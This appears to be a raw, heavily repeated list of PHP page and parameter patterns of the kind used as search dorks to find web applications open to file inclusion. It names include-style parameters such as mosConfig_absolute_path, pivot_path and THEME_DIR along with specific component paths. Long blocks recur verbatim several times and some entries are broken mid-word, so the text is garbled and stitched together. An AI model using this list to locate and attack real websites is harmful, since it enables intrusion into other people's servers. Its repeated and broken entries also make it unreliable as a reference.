+path.php?pageweb=
+info.php?r=
+base.php?phpbb_root_path=
+main.php?itemnav=
+view.php?pg=
+pagina.php?choix=
+default.php?itemnav=
+index2.php?cmd=
+layout.php?url=
+index.php?path=
+index1.php?second=
+start.php?modo=
+index1.php?get=
+index3.php?my=
+sub*.php?left=
+print.php?inc=
+view.php?type=
+path.php?*[*]*=
+base.php?adresa=
+index3.php?oldal=
+standard.php?bOdy=
+base.php?path=
+principal.php?strona=
+info.php?l=
+template.php?left=
+head.php?loc=
+page.php?ir=
+print.php?path=
+down*.php?path=
+sitio.php?opcion=
+pagina.php?category=
+press.php?menu=
+index2.php?pref=
+sitio.php?incl=
+show.php?ki=
+index3.php?x=
+page.php?strona=
+*inc*.php?open=
+index3.php?secao=
+standard.php?*[*]*=
+template.php?basepath=
+standard.php?goFile=
+index2.php?ir=
+file.php?modo=
+gery.php?itemnav=
+main.php?oldal=
+down*.php?showpage=
+start.php?destino=
+blank.php?rub=
+path.php?ir=
+layout.php?var=
+index1.php?texto=
+start.php?pg=
+index1.php?showpage=
+info.php?go=
+path.php?load=
+index3.php?abre=
+blank.php?where=
+info.php?start=
+page.php?secao=
+nota.php?pag=
+nota.php?second=
+index2.php?to=
+standard.php?name=
+start.php?strona=
+mod*.php?numero=
+press.php?home=
+info.php?z=
+mod*.php?path=
+blank.php?base_dir=
+base.php?texto=
+nota.php?secc=
+index.php?tipo=
+index.php?goto=
+print.php?pag=
+view.php?secao=
+general.php?strona=
+show.php?my=
+page.php?e=
+padrao.php?index=
+gery.php?thispage=
+start.php?base_dir=
+default.php?tipo=
+gery.php?panel=
+standard.php?ev=
+standard.php?destino=
+general.php?middle=
+main.php?basepath=
+standard.php?q=
+index1.php?tipo=
+mod*.php?choix=
+template.php?ir=
+show.php?adresa=
+general.php?mid=
+index3.php?adresa=
+pagina.php?sec=
+template.php?secao=
+home.php?w=
+general.php?content=
+sub*.php?recipe=
+main.php?category=
+enter.php?viewpage=
+main.php?ir=
+show.php?pageweb=
+principal.php?ir=
+default.php?pageweb=
+index.php?oldal=
+head.php?d=
+gery.php?mid=
+index.php?type=
+standard.php?j=
+show.php?oldal=
+enter.php?link=
+enter.php?content=
+blank.php?filepath=
+standard.php?channel=
+base.php?*[*]*=
+info.php?incl=
+down*.php?include=
+press.php?modo=
+file.php?choix=
+press.php?type=
+blank.php?goto=
+index3.php?showpage=
+principal.php?subject=
+start.php?chapter=
+show.php?r=
+pagina.php?thispage=
+general.php?chapter=
+page.php?base_dir=
+page.php?qry=
+show.php?incl=
+page.php?*[*]*=
+main.php?h=
+file.php?seccion=
+default.php?pre=
+principal.php?index=
+principal.php?inc=
+home.php?z=
+pagina.php?in=
+show.php?play=
+nota.php?subject=
+default.php?secc=
+default.php?loader=
+padrao.php?var=
+mod*.php?b=
+default.php?showpage=
+press.php?channel=
+pagina.php?ev=
+sitio.php?name=
+page.php?option=
+press.php?mid=
+down*.php?corpo=
+view.php?get=
+print.php?thispage=
+principal.php?home=
+show.php?param=
+standard.php?sivu=
+index3.php?panel=
+include.php?play=
+path.php?cmd=
+file.php?sp=
+template.php?section=
+view.php?str=
+blank.php?left=
+nota.php?lang=
+path.php?sivu=
+main.php?e=
+default.php?ref=
+start.php?seite=
+default.php?inc=
+print.php?disp=
+home.php?h=
+principal.php?loc=
+index3.php?sp=
+gery.php?var=
+sub*.php?base_dir=
+path.php?middle=
+pagina.php?str=
+base.php?play=
+base.php?v=
+sitio.php?sivu=
+main.php?r=
+file.php?nivel=
+start.php?sivu=
+template.php?c=
+general.php?second=
+sub*.php?mod=
+home.php?loc=
+head.php?corpo=
+standard.php?op=
+index2.php?inc=
+info.php?pref=
+base.php?basepath=
+print.php?basepath=
+*inc*.php?m=
+base.php?home=
+layout.php?strona=
+padrao.php?url=
+sitio.php?oldal=
+pagina.php?read=
+index1.php?go=
+standard.php?s=
+page.php?eval=
+index.php?j=
+pagina.php?pr=
+start.php?secao=
+template.php?*[*]*=
+nota.php?get=
+index3.php?link=
+home.php?e=
+gery.php?name=
+nota.php?eval=
+sub*.php?abre=
+index2.php?load=
+principal.php?in=
+view.php?load=
+mod*.php?action=
+default.php?p=
+head.php?c=
+template.php?viewpage=
+view.php?mid=
+padrao.php?addr=
+view.php?go=
+file.php?basepath=
+home.php?pre=
+include.php?goFile=
+layout.php?play=
+index1.php?subject=
+info.php?middlePart=
+down*.php?pg=
+sub*.php?bOdy=
+index.php?option=
+sub*.php?chapter=
+default.php?t=
+head.php?opcion=
+nota.php?panel=
+sitio.php?left=
+show.php?include=
+pagina.php?start=
+head.php?choix=
+index3.php?tipo=
+index3.php?choix=
+down*.php?channel=
+base.php?pa=
+nota.php?sekce=
+show.php?l=
+show.php?index=
+blank.php?url=
+start.php?thispage=
+nota.php?play=
+show.php?second=
+enter.php?include=
+principal.php?middle=
+main.php?where=
+padrao.php?link=
+path.php?strona=
+index3.php?read=
+mod*.php?module=
+standard.php?viewpage=
+standard.php?pr=
+*inc*.php?showpage=
+pagina.php?ref=
+path.php?pname=
+padrao.php?mid=
+info.php?eval=
+include.php?path=
+page.php?subject=
+sub*.php?qry=
+head.php?module=
+nota.php?opcion=
+head.php?abre=
+base.php?str=
+home.php?bOdy=
+gery.php?module=
+head.php?sivu=
+page.php?inc=
+pagina.php?header=
+mod*.php?v=
+home.php?doshow=
+padrao.php?n=
+index1.php?chapter=
+padrao.php?basepath=
+index.php?r=
+index3.php?seccion=
+sitio.php?mid=
+index.php?where=
+general.php?type=
+
+pagina.php?goto=
+page.php?pa=
+default.php?menue=
+main.php?goto=
+index1.php?abre=
+info.php?seccion=
+index2.php?pa=
+layout.php?pageweb=
+nota.php?disp=
+index1.php?bOdy=
+default.php?nivel=
+show.php?header=
+down*.php?pag=
+start.php?tipo=
+standard.php?w=
+index.php?open=
+blank.php?menu=
+general.php?nivel=
+padrao.php?nivel=
+*inc*.php?addr=
+index.php?var=
+home.php?redirect=
+*inc*.php?link=
+*inc*.php?incl=
+padrao.php?corpo=
+down*.php?url=
+enter.php?goto=
+down*.php?addr=
+sub*.php?j=
+principal.php?f=
+sub*.php?menue=
+index2.php?section=
+general.php?my=
+head.php?loader=
+general.php?goto=
+include.php?dir=
+start.php?header=
+blank.php?in=
+base.php?name=
+nota.php?goFile=
+head.php?base_dir=
+mod*.php?recipe=
+press.php?pr=
+padrao.php?*[*]*=
+layout.php?opcion=
+print.php?rub=
+index.php?pr=
+general.php?seite=
+pagina.php?numero=
+*inc*.php?pg=
+nota.php?rub=
+view.php?seite=
+pagina.php?recipe=
+index.php?pref=
+page.php?action=
+page.php?ev=
+show.php?ir=
+head.php?index=
+mod*.php?pname=
+view.php?ir=
+*inc*.php?start=
+principal.php?rub=
+principal.php?corpo=
+padrao.php?middle=
+base.php?pname=
+template.php?header=
+view.php?sp=
+main.php?name=
+nota.php?m=
+blank.php?open=
+head.php?dir=
+page.php?pname=
+*inc*.php?k=
+index.php?pollname=
+head.php?oldal=
+index1.php?str=
+template.php?choix=
+down*.php?pollname=
+page.php?recipe=
+template.php?corpo=
+nota.php?sec=
+info.php?*[*]*=
+sub*.php?*[*]*=
+page.php?q=
+index1.php?type=
+gery.php?y=
+standard.php?lang=
+gery.php?page=
+index.php?action=
+press.php?pname=
+down*.php?v=
+index3.php?second=
+show.php?recipe=
+main.php?pre=
+file.php?numero=
+print.php?str=
+standard.php?link=
+nota.php?OpenPage=
+view.php?pollname=
+print.php?l=
+index.php?go=
+standard.php?numero=
+view.php?pr=
+down*.php?read=
+down*.php?action=
+index1.php?OpenPage=
+principal.php?left=
+mod*.php?start=
+file.php?bOdy=
+gery.php?pg=
+blank.php?qry=
+base.php?eval=
+default.php?left=
+gery.php?param=
+blank.php?pa=
+nota.php?b=
+path.php?loader=
+start.php?o=
+include.php?include=
+nota.php?corpo=
+enter.php?second=
+sub*.php?pname=
+mod*.php?pageweb=
+principal.php?addr=
+standard.php?action=
+template.php?lang=
+include.php?basepath=
+sub*.php?ir=
+down*.php?nivel=
+path.php?opcion=
+print.php?category=
+print.php?menu=
+layout.php?secao=
+template.php?param=
+standard.php?ref=
+base.php?include=
+blank.php?bOdy=
+path.php?pref=
+print.php?g=
+padrao.php?subject=
+nota.php?modo=
+index3.php?loader=
+template.php?seite=
+general.php?pageweb=
+index2.php?param=
+path.php?nivel=
+page.php?pref=
+press.php?pref=
+enter.php?ev=
+standard.php?middle=
+index2.php?recipe=
+blank.php?dir=
+home.php?pageweb=
+view.php?panel=
+down*.php?home=
+head.php?ir=
+mod*.php?ir=
+show.php?pagina=
+default.php?base_dir=
+show.php?loader=
+path.php?mid=
+blank.php?abre=
+down*.php?choix=
+info.php?opcion=
+page.php?loader=
+principal.php?oldal=
+index1.php?load=
+home.php?content=
+pagina.php?sekce=
+file.php?n=
+include.php?redirect=
+print.php?itemnav=
+enter.php?index=
+print.php?middle=
+sitio.php?goFile=
+head.php?include=
+enter.php?e=
+index.php?play=
+enter.php?id=
+view.php?mod=
+show.php?nivel=
+file.php?channel=
+layout.php?choix=
+info.php?bOdy=
+include.php?go=
+index3.php?nivel=
+sub*.php?include=
+path.php?numero=
+principal.php?header=
+main.php?opcion=
+enter.php?s=
+sub*.php?pre=
+include.php?index=
+gery.php?pageweb=
+padrao.php?path=
+info.php?url=
+press.php?ev=
+index1.php?pg=
+print.php?in=
+general.php?modo=
+head.php?ki=
+press.php?my=
+index1.php?pollname=
+principal.php?to=
+default.php?play=
+page.php?g=
+nota.php?pg=
+blank.php?destino=
+blank.php?z=
+components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=
+module_db.php?pivot_path= module_db.php?pivot_path=
+/classes/adodbt/sql.php?classes_dir= /classes/adodbt/sql.php?classes_dir=
+components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_p ath=
+com_extended_registration
+smarty_config.php?root_dir= smarty
+include/editfunc.inc.php?NWCONF_SYSTEM[server_path]= site:.gr
+send_reminders.php?includedir= send_reminders.php?includedir=
+components/com_rsgery/rsgery.html.php?mosConfig_absolute_path= com_rsgery
+inc/functions.inc.php?config[ppa_root_path]= Index Albums index.php
+/components/com_cpg/cpg.php?mosConfig_absolute_path= com_cpg
+[Script Path]/admin/index.php?o= admin/index.php;
+/admin/index.php?o= admin/index.php;
+/modules/coppermine/themes/coppercop/theme.php?THEME_DIR= coppermine
+/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]= com_extcalendar
+admin/doeditconfig.php?thispath=../includes&config[path]= admin
+/components/com_simpleboard/image_upload.php?sbp= com_simpleboard
+components/com_simpleboard/image_upload.php?sbp= com_simpleboard
+/modules/coppermine/themes/coppercop/theme.php?THEME_DIR= coppermine
+mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=
+zentrack/index.php?configFile=
+inst/index.php?lng=../../include/main.inc&G_PATH=
+pivot/modules/module_db.php?pivot_path=
+include/write.php?dir=
+includes/header.php?systempath=
+becommunity/community/index.php?pageurl=
+agendax/addevent.inc.php?agendax_path=
+myPHPCalendar/admin.php?cal_dir=
+yabbse/Sources/Packages.php?sourcedir=
+zboard/zboard.php
+
+path_of_cpcommerce/_functions.php?prefixpage.php?pa=
+default.php?menue=
+main.php?goto=
+index1.php?abre=
+info.php?seccion=
+index2.php?pa=
+layout.php?pageweb=
+nota.php?disp=
+index1.php?bOdy=
+default.php?nivel=
+show.php?header=
+down*.php?pag=
+start.php?tipo=
+standard.php?w=
+index.php?open=
+blank.php?menu=
+general.php?nivel=
+padrao.php?nivel=
+*inc*.php?addr=
+index.php?var=
+home.php?redirect=
+*inc*.php?link=
+*inc*.php?incl=
+padrao.php?corpo=
+down*.php?url=
+enter.php?goto=
+down*.php?addr=
+sub*.php?j=
+principal.php?f=
+sub*.php?menue=
+index2.php?section=
+general.php?my=
+head.php?loader=
+general.php?goto=
+include.php?dir=
+start.php?header=
+blank.php?in=
+base.php?name=
+nota.php?goFile=
+head.php?base_dir=
+mod*.php?recipe=
+press.php?pr=
+padrao.php?*[*]*=
+layout.php?opcion=
+print.php?rub=
+index.php?pr=
+general.php?seite=
+pagina.php?numero=
+*inc*.php?pg=
+nota.php?rub=
+view.php?seite=
+pagina.php?recipe=
+index.php?pref=
+page.php?action=
+page.php?ev=
+show.php?ir=
+head.php?index=
+mod*.php?pname=
+view.php?ir=
+*inc*.php?start=
+principal.php?rub=
+principal.php?corpo=
+padrao.php?middle=
+base.php?pname=
+template.php?header=
+view.php?sp=
+main.php?name=
+nota.php?m=
+blank.php?open=
+head.php?dir=
+page.php?pname=
+*inc*.php?k=
+index.php?pollname=
+head.php?oldal=
+index1.php?str=
+template.php?choix=
+down*.php?pollname=
+page.php?recipe=
+template.php?corpo=
+nota.php?sec=
+info.php?*[*]*=
+sub*.php?*[*]*=
+page.php?q=
+index1.php?type=
+gery.php?y=
+standard.php?lang=
+gery.php?page=
+index.php?action=
+press.php?pname=
+down*.php?v=
+index3.php?second=
+show.php?recipe=
+main.php?pre=
+file.php?numero=
+print.php?str=
+standard.php?link=
+nota.php?OpenPage=
+view.php?pollname=
+print.php?l=
+index.php?go=
+standard.php?numero=
+view.php?pr=
+down*.php?read=
+down*.php?action=
+index1.php?OpenPage=
+principal.php?left=
+mod*.php?start=
+file.php?bOdy=
+gery.php?pg=
+blank.php?qry=
+base.php?eval=
+default.php?left=
+gery.php?param=
+blank.php?pa=
+nota.php?b=
+path.php?loader=
+start.php?o=
+include.php?include=
+nota.php?corpo=
+enter.php?second=
+sub*.php?pname=
+mod*.php?pageweb=
+principal.php?addr=
+standard.php?action=
+template.php?lang=
+include.php?basepath=
+sub*.php?ir=
+down*.php?nivel=
+path.php?opcion=
+print.php?category=
+print.php?menu=
+layout.php?secao=
+template.php?param=
+standard.php?ref=
+base.php?include=
+blank.php?bOdy=
+path.php?pref=
+print.php?g=
+padrao.php?subject=
+nota.php?modo=
+index3.php?loader=
+template.php?seite=
+general.php?pageweb=
+index2.php?param=
+path.php?nivel=
+page.php?pref=
+press.php?pref=
+enter.php?ev=
+standard.php?middle=
+index2.php?recipe=
+blank.php?dir=
+home.php?pageweb=
+view.php?panel=
+down*.php?home=
+head.php?ir=
+mod*.php?ir=
+show.php?pagina=
+default.php?base_dir=
+show.php?loader=
+path.php?mid=
+blank.php?abre=
+down*.php?choix=
+info.php?opcion=
+page.php?loader=
+principal.php?oldal=
+index1.php?load=
+home.php?content=
+pagina.php?sekce=
+file.php?n=
+include.php?redirect=
+print.php?itemnav=
+enter.php?index=
+print.php?middle=
+sitio.php?goFile=
+head.php?include=
+enter.php?e=
+index.php?play=
+enter.php?id=
+view.php?mod=
+show.php?nivel=
+file.php?channel=
+layout.php?choix=
+info.php?bOdy=
+include.php?go=
+index3.php?nivel=
+sub*.php?include=
+path.php?numero=
+principal.php?header=
+main.php?opcion=
+enter.php?s=
+sub*.php?pre=
+include.php?index=
+gery.php?pageweb=
+padrao.php?path=
+info.php?url=
+press.php?ev=
+index1.php?pg=
+print.php?in=
+general.php?modo=
+head.php?ki=
+press.php?my=
+index1.php?pollname=
+principal.php?to=
+default.php?play=
+page.php?g=
+nota.php?pg=
+blank.php?destino=
+blank.php?z=
+components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=
+module_db.php?pivot_path= module_db.php?pivot_path=
+/classes/adodbt/sql.php?classes_dir= /classes/adodbt/sql.php?classes_dir=
+components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_p ath=
+com_extended_registration
+smarty_config.php?root_dir= smarty
+include/editfunc.inc.php?NWCONF_SYSTEM[server_path]= site:.gr
+send_reminders.php?includedir= send_reminders.php?includedir=
+components/com_rsgery/rsgery.html.php?mosConfig_absolute_path= com_rsgery
+inc/functions.inc.php?config[ppa_root_path]= Index Albums index.php
+/components/com_cpg/cpg.php?mosConfig_absolute_path= com_cpg
+[Script Path]/admin/index.php?o= admin/index.php;
+/admin/index.php?o= admin/index.php;
+/modules/coppermine/themes/coppercop/theme.php?THEME_DIR= coppermine
+/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]= com_extcalendar
+admin/doeditconfig.php?thispath=../includes&config[path]= admin
+/components/com_simpleboard/image_upload.php?sbp= com_simpleboard
+components/com_simpleboard/image_upload.php?sbp= com_simpleboard
+/modules/coppermine/themes/coppercop/theme.php?THEME_DIR= coppermine
+mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=
+zentrack/index.php?configFile=
+inst/index.php?lng=../../include/main.inc&G_PATH=
+pivot/modules/module_db.php?pivot_path=
+include/write.php?dir=
+includes/header.php?systempath=
+becommunity/community/index.php?pageurl=
+agendax/addevent.inc.php?agendax_path=
+myPHPCalendar/admin.php?cal_dir=
+yabbse/Sources/Packages.php?sourcedir=
+zboard/zboard.php
+path_of_cpcommerce/_functions.php?prefixpage.php?pa=
+default.php?menue=
+main.php?goto=
+index1.php?abre=
+info.php?seccion=
+index2.php?pa=
+layout.php?pageweb=
+nota.php?disp=
+index1.php?bOdy=
+default.php?nivel=
+show.php?header=
+down*.php?pag=
+start.php?tipo=
+standard.php?w=
+index.php?open=
+blank.php?menu=
+general.php?nivel=
+padrao.php?nivel=
+*inc*.php?addr=
+index.php?var=
+home.php?redirect=
+*inc*.php?link=
+*inc*.php?incl=
+padrao.php?corpo=
+down*.php?url=
+enter.php?goto=
+down*.php?addr=
+sub*.php?j=
+principal.php?f=
+sub*.php?menue=
+index2.php?section=
+general.php?my=
+head.php?loader=
+general.php?goto=
+include.php?dir=
+start.php?header=
+blank.php?in=
+base.php?name=
+nota.php?goFile=
+head.php?base_dir=
+mod*.php?recipe=
+press.php?pr=
+padrao.php?*[*]*=
+layout.php?opcion=
+print.php?rub=
+index.php?pr=
+general.php?seite=
+pagina.php?numero=
+*inc*.php?pg=
+nota.php?rub=
+view.php?seite=
+pagina.php?recipe=
+index.php?pref=
+page.php?action=
+page.php?ev=
+show.php?ir=
+head.php?index=
+mod*.php?pname=
+view.php?ir=
+*inc*.php?start=
+principal.php?rub=
+principal.php?corpo=
+padrao.php?middle=
+base.php?pname=
+template.php?header=
+view.php?sp=
+main.php?name=
+nota.php?m=
+blank.php?open=
+head.php?dir=
+page.php?pname=
+*inc*.php?k=
+index.php?pollname=
+head.php?oldal=
+index1.php?str=
+template.php?choix=
+down*.php?pollname=
+page.php?recipe=
+template.php?corpo=
+nota.php?sec=
+info.php?*[*]*=
+sub*.php?*[*]*=
+page.php?q=
+index1.php?type=
+gery.php?y=
+standard.php?lang=
+gery.php?page=
+index.php?action=
+press.php?pname=
+down*.php?v=
+index3.php?second=
+show.php?recipe=
+main.php?pre=
+file.php?numero=
+print.php?str=
+standard.php?link=
+nota.php?OpenPage=
+view.php?pollname=
+print.php?l=
+index.php?go=
+standard.php?numero=
+view.php?pr=
+down*.php?read=
+down*.php?action=
+index1.php?OpenPage=
+principal.php?left=
+mod*.php?start=
+file.php?bOdy=
+gery.php?pg=
+blank.php?qry=
+base.php?eval=
+default.php?left=
+gery.php?param=
+blank.php?pa=
+nota.php?b=
+path.php?loader=
+start.php?o=
+include.php?include=
+nota.php?corpo=
+enter.php?second=
+sub*.php?pname=
+mod*.php?pageweb=
+principal.php?addr=
+standard.php?action=
+template.php?lang=
+include.php?basepath=
+sub*.php?ir=
+down*.php?nivel=
+path.php?opcion=
+print.php?category=
+print.php?menu=
+layout.php?secao=
+template.php?param=
+standard.php?ref=
+base.php?include=
+blank.php?bOdy=
+path.php?pref=
+print.php?g=
+padrao.php?subject=
+nota.php?modo=
+index3.php?loader=
+template.php?seite=
+general.php?pageweb=
+index2.php?param=
+path.php?nivel=
+page.php?pref=
+press.php?pref=
+enter.php?ev=
+standard.php?middle=
+index2.php?recipe=
+blank.php?dir=
+home.php?pageweb=
+view.php?panel=
+down*.php?home=
+head.php?ir=
+mod*.php?ir=
+show.php?pagina=
+default.php?base_dir=
+show.php?loader=
+path.php?mid=
+blank.php?abre=
+down*.php?choix=
+info.php?opcion=
+page.php?loader=
+principal.php?oldal=
+index1.php?load=
+home.php?content=
+pagina.php?sekce=
+file.php?n=
+include.php?redirect=
+print.php?itemnav=
+enter.php?index=
+print.php?middle=
+sitio.php?goFile=
+head.php?include=
+enter.php?e=
+index.php?play=
+enter.php?id=
+view.php?mod=
+show.php?nivel=
+file.php?channel=
+layout.php?choix=
+info.php?bOdy=
+include.php?go=
+index3.php?nivel=
+sub*.php?include=
+path.php?numero=
+principal.php?header=
+main.php?opcion=
+enter.php?s=
+sub*.php?pre=
+include.php?index=
+gery.php?pageweb=
+padrao.php?path=
+info.php?url=
+press.php?ev=
+index1.php?pg=
+print.php?in=
+general.php?modo=
+head.php?ki=
+press.php?my=
+index1.php?pollname=
+principal.php?to=
+default.php?play=
+page.php?g=
+nota.php?pg=
+blank.php?destino=
+blank.php?z=
+components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=
+module_db.php?pivot_path= module_db.php?pivot_path=
+/classes/adodbt/sql.php?classes_dir= /classes/adodbt/sql.php?classes_dir=
+components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_p ath=
+com_extended_registration
+smarty_config.php?root_dir= smarty
+include/editfunc.inc.php?NWCONF_SYSTEM[server_path]= site:.gr
+send_reminders.php?includedir= send_reminders.php?includedir=
+components/com_rsgery/rsgery.html.php?mosConfig_absolute_path= com_rsgery
+inc/functions.inc.php?config[ppa_root_path]= Index Albums index.php
+/components/com_cpg/cpg.php?mosConfig_absolute_path= com_cpg
+[Script Path]/admin/index.php?o= admin/index.php;
+/admin/index.php?o= admin/index.php;
+/modules/coppermine/themes/coppercop/theme.php?THEME_DIR= coppermine
+/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]= com_extcalendar
+admin/doeditconfig.php?thispath=../includes&config[path]= admin
+/components/com_simpleboard/image_upload.php?sbp= com_simpleboard
+components/com_simpleboard/image_upload.php?sbp= com_simpleboard
+/modules/coppermine/themes/coppercop/theme.php?THEME_DIR= coppermine
+mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=
+zentrack/index.php?configFile=
+inst/index.php?lng=../../include/main.inc&G_PATH=
+pivot/modules/module_db.php?pivot_path=
+include/write.php?dir=
+includes/header.php?systempath=
+becommunity/community/index.php?pageurl=
+agendax/addevent.inc.php?agendax_path=
+myPHPCalendar/admin.php?cal_dir=
+yabbse/Sources/Packages.php?sourcedir=
+zboard/zboard.php
+path_of_cpcommerce/_functions.php?prefixpage.php?pa=
+default.php?menue=
+main.php?goto=
+index1.php?abre=
+info.php?seccion=
+index2.php?pa=
+layout.php?pageweb=
+nota.php?disp=
+index1.php?bOdy=
+default.php?nivel=
+show.php?header=
+down*.php?pag=
+start.php?tipo=
+standard.php?w=
+index.php?open=
+blank.php?menu=
+general.php?nivel=
+padrao.php?nivel=
+*inc*.php?addr=
+index.php?var=
+home.php?redirect=
+*inc*.php?link=
+*inc*.php?incl=
+padrao.php?corpo=
+down*.php?url=
+enter.php?goto=
+down*.php?addr=
+sub*.php?j=
+principal.php?f=
+sub*.php?menue=
+index2.php?section=
+general.php?my=
+head.php?loader=
+general.php?goto=
+include.php?dir=
+start.php?header=
+blank.php?in=
+base.php?name=
+nota.php?goFile=
+head.php?base_dir=
+mod*.php?recipe=
+press.php?pr=
+padrao.php?*[*]*=
+layout.php?opcion=
+print.php?rub=
+index.php?pr=
+general.php?seite=
+pagina.php?numero=
+*inc*.php?pg=
+nota.php?rub=
+view.php?seite=
+pagina.php?recipe=
+index.php?pref=
+page.php?action=
+page.php?ev=
+show.php?ir=
+head.php?index=
+mod*.php?pname=
+view.php?ir=
+*inc*.php?start=
+principal.php?rub=
+principal.php?corpo=
+padrao.php?middle=
+base.php?pname=
+template.php?header=
+view.php?sp=
+main.php?name=
+nota.php?m=
+blank.php?open=
+head.php?dir=
+page.php?pname=
+*inc*.php?k=
+index.php?pollname=
+head.php?oldal=
+index1.php?str=
+template.php?choix=
+down*.php?pollname=
+page.php?recipe=
+template.php?corpo=
+nota.php?sec=
+info.php?*[*]*=
+sub*.php?*[*]*=
+page.php?q=
+index1.php?type=
+gery.php?y=
+standard.php?lang=
+gery.php?page=
+index.php?action=
+press.php?pname=
+down*.php?v=
+index3.php?second=
+show.php?recipe=
+main.php?pre=
+file.php?numero=
+print.php?str=
+standard.php?link=
+nota.php?OpenPage=
+view.php?pollname=
+print.php?l=
+index.php?go=
+standard.php?numero=
+view.php?pr=
+down*.php?read=
+down*.php?action=
+index1.php?OpenPage=
+principal.php?left=
+mod*.php?start=
+file.php?bOdy=
+gery.php?pg=
+blank.php?qry=
+base.php?eval=
+default.php?left=
+gery.php?param=
+blank.php?pa=
+nota.php?b=
+path.php?loader=
+start.php?o=
+include.php?include=
+nota.php?corpo=
+enter.php?second=
+sub*.php?pname=
+mod*.php?pageweb=
+principal.php?addr=
+standard.php?action=
+template.php?lang=
+include.php?basepath=
+sub*.php?ir=
+down*.php?nivel=
+path.php?opcion=
+print.php?category=
+print.php?menu=
+layout.php?secao=
+template.php?param=
+standard.php?ref=
+base.php?include=
+blank.php?bOdy=
+path.php?pref=
+print.php?g=
+padrao.php?subject=
+nota.php?modo=
+index3.php?loader=
+template.php?seite=
+general.php?pageweb=
+index2.php?param=
+path.php?nivel=
+page.php?pref=
+press.php?pref=
+enter.php?ev=
+standard.php?middle=
+index2.php?recipe=
+blank.php?dir=
+home.php?pageweb=
+view.php?panel=
+down*.php?home=
+head.php?ir=
+mod*.php?ir=
+show.php?pagina=
+default.php?base_dir=
+show.php?loader=
+path.php?mid=
+blank.php?abre=
+down*.php?choix=
+info.php?opcion=
+page.php?loader=
+principal.php?oldal=
+index1.php?load=
+home.php?content=
+pagina.php?sekce=
+file.php?n=
+include.php?redirect=
+print.php?itemnav=
+enter.php?index=
+print.php?middle=
+sitio.php?goFile=
+head.php?include=
+enter.php?e=
+index.php?play=
+enter.php?id=
+view.php?mod=
+show.php?nivel=
+file.php?channel=
+layout.php?choix=
+info.php?bOdy=
+include.php?go=
+index3.php?nivel=
+sub*.php?include=
+path.php?numero=
+principal.php?header=
+main.php?opcion=
+enter.php?s=
+sub*.php?pre=
+include.php?index=
+gery.php?pageweb=
+padrao.php?path=
+info.php?url=
+press.php?ev=
+index1.php?pg=
+print.php?in=
+general.php?modo=
+head.php?ki=
+press.php?my=
+index1.php?pollname=
+principal.php?to=
+default.php?play=
+page.php?g=
+nota.php?pg=
+blank.php?destino=
+blank.php?z=
+components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=
+module_db.php?pivot_path= module_db.php?pivot_path=
+/classes/adodbt/sql.php?classes_dir= /classes/adodbt/sql.php?classes_dir=
+components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_p ath=
+com_extended_registration
+smarty_config.php?root_dir= smarty
+include/editfunc.inc.php?NWCONF_SYSTEM[server_path]= site:.gr
+send_reminders.php?includedir= send_reminders.php?includedir=
+components/com_rsgery/rsgery.html.php?mosConfig_absolute_path= com_rsgery
+inc/functions.inc.php?config[ppa_root_path]= Index Albums index.php
+/components/com_cpg/cpg.php?mosConfig_absolute_path= com_cpg
+[Script Path]/admin/index.php?o= admin/index.php;
+/admin/index.php?o= admin/index.php;
+/modules/coppermine/themes/coppercop/theme.php?THEME_DIR= coppermine
+/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]= com_extcalendar
+admin/doeditconfig.php?thispath=../includes&config[path]= admin
+/components/com_simpleboard/image_upload.php?sbp= com_simpleboard
+components/com_simpleboard/image_upload.php?sbp= com_simpleboard
+/modules/coppermine/themes/coppercop/theme.php?THEME_DIR= coppermine
+mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=
+zentrack/index.php?configFile=
+inst/index.php?lng=../../include/main.inc&G_PATH=
+pivot/modules/module_db.php?pivot_path=
+include/write.php?dir=
+includes/header.php?systempath=
+becommunity/community/index.php?pageurl=
+agendax/addevent.inc.php?agendax_path=
+myPHPCalendar/admin.php?cal_dir=
+yabbse/Sources/Packages.php?sourcedir=
+zboard/zboard.php
+path_of_cpcommerce/_functions.php?prefixpage.php?pa=
+default.php?menue=
+main.php?goto=
+index1.php?abre=
+info.php?seccion=
+index2.php?pa=
+layout.php?pageweb=
+nota.php?disp=
+index1.php?bOdy=
+default.php?nivel=
+show.php?header=
+down*.php?pag=
+start.php?tipo=
+standard.php?w=
+index.php?open=
+blank.php?menu=
+general.php?nivel=
+padrao.php?nivel=
+*inc*.php?addr=
+index.php?var=
+home.php?redirect=
+*inc*.php?link=
+*inc*.php?incl=
+padrao.php?corpo=
+down*.php?url=
+enter.php?goto=
+down*.php?addr=
+sub*.php?j=
+principal.php?f=
+sub*.php?menue=
+index2.php?section=
+general.php?my=
+head.php?loader=
+general.php?goto=
+include.php?dir=
+start.php?header=
+blank.php?in=
+base.php?name=
+nota.php?goFile=
+head.php?base_dir=
+mod*.php?recipe=
+press.php?pr=
+padrao.php?*[*]*=
+layout.php?opcion=
+print.php?rub=
+index.php?pr=
+general.php?seite=
+pagina.php?numero=
+*inc*.php?pg=
+nota.php?rub=
+view.php?seite=
+pagina.php?recipe=
+index.php?pref=
+page.php?action=
+page.php?ev=
+show.php?ir=
+head.php?index=
+mod*.php?pname=
+view.php?ir=
+*inc*.php?start=
+principal.php?rub=
+principal.php?corpo=
+padrao.php?middle=
+base.php?pname=
+template.php?header=
+view.php?sp=
+main.php?name=
+nota.php?m=
+blank.php?open=
+head.php?dir=
+page.php?pname=
+*inc*.php?k=
+index.php?pollname=
+head.php?oldal=
+index1.php?str=
+template.php?choix=
+down*.php?pollname=
+page.php?recipe=
+template.php?corpo=
+nota.php?sec=
+info.php?*[*]*=
+sub*.php?*[*]*=
+page.php?q=
+index1.php?type=
